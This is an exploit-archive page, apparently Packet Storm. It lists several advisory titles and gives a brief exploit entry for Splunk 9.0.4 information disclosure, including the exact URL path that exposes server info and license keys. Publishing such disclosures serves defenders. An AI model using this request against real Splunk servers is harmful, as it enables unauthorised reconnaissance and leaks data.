Acronis Cyber Protect/Backup Remote Code Execution

Fortinet FortiManager Unauthenticated Remote Code Execution

Asterisk AMI Originate Authenticated Remote Code Execution

Debian Security Advisory 5823-1

Debian Security Advisory 5815-2

Splunk version 9.0.4 suffers from an information disclosure vulnerability.

Change Mirror Download

    # Exploit Title: Splunk 9.0.4 - Information Disclosure# Date: 2023-09-18# Exploit Author: Parsa rezaie khiabanloo# Vendor Homepage: https://www.splunk.com/# Version: 9.0.4 # Tested on: Windows OS# Splunk through 9.0.4  allows information disclosure by appending# /__raw/services/server/info/server-info?output_mode=json to a query,# as demonstrated by discovering a license key and other information.# PoC :https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

Headline

Splunk 9.0.4 Information Disclosure

Packet Storm: Latest News